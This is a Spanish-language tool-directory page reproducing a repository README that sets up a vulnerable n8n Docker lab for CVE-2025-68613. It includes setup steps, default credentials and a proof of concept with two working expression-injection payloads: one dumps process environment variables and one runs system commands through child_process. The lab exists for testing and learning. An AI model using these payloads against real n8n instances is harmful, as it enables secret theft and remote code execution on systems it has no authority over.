Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/r4j3sh-com/cve-2025-68613-n8n-lab
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubr4j3sh-com/cve-2025-68613-n8n-lab

CVE-2025-68613-n8n-lab

Análisis de CVE-2025-68613

Ver Repositorio
2hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-68613 Laboratorio local n8n

Este repositorio proporciona una configuración sencilla de Docker Compose que ejecuta una instancia vulnerable de n8n para pruebas locales de CVE-2025-68613.

Requisitos

  • Docker Desktop o Docker Engine
  • Docker Compose v2

Inicio rápido

  1. Inicie el contenedor:

    root@kitploit:~
    docker compose up -d
    
  2. Abra n8n en su navegador:

    • http://localhost:5678
  3. Inicie sesión con las credenciales predeterminadas definidas en docker-compose.yml:

    • Usuario: admin
    • Contraseña: password

Detener y limpiar

root@kitploit:~
docker compose down

Aviso legal y seguridad

Descargar herramienta

Este entorno es solo para pruebas locales y aisladas. No exponga esta instancia a internet pública ni a ninguna red no confiable. Manténgala en un segmento de red privado y solo local, separado de los sistemas de producción. Úselo bajo su propio riesgo.

Verificar la vulnerabilidad (Prueba de concepto)

Una vez que el contenedor esté en ejecución, puede acceder a la interfaz de n8n en http://localhost:5678. Para probar la vulnerabilidad, inyectará una carga útil de JavaScript malicioso en un campo de expresión. Pasos para reproducir:

  1. Inicie sesión: Acceda al panel (si configuró autenticación básica, use las credenciales proporcionadas; de lo contrario, cree una nueva cuenta de propietario).
  2. Crear flujo de trabajo: Haga clic en "Add Workflow" o navegue a https://n8n.example.com/workflow/new.
  3. Agregar nodo: Agregue un nodo "Set".
  4. Inyectar la carga útil: En el campo "Value" del nodo Set (asegúrese de activar el "modo Expression" si está disponible, o simplemente pegue la sintaxis que n8n interpreta como expresión), introduzca una de las siguientes cargas útiles: Prueba 1: Exfiltración de variables de entorno Esta carga útil intenta acceder a las variables de entorno del proceso, que a menudo contienen secretos.
root@kitploit:~
{{ (function() { return this.process.env; })() }}

env exfilteration

Prueba 2: Ejecución remota de código (RCE) Esta carga útil intenta cargar el módulo child_process para ejecutar comandos del sistema (por ejemplo, whoami).

root@kitploit:~
{{ (function() {
    var require = this.process.mainModule.require;
    var execSync = require('child_process').execSync;
    return execSync('whoami').toString();
})() }}

RCE example for id command

Resultado esperado: Si el entorno es vulnerable, el panel "Output" del nodo Set mostrará el resultado del comando (por ejemplo, root o el usuario de n8n) o un objeto JSON que contiene las variables de entorno. Si la instancia estuviera parcheada (por ejemplo, versión 1.122.0+), el sandbox devolvería un objeto vacío o un error.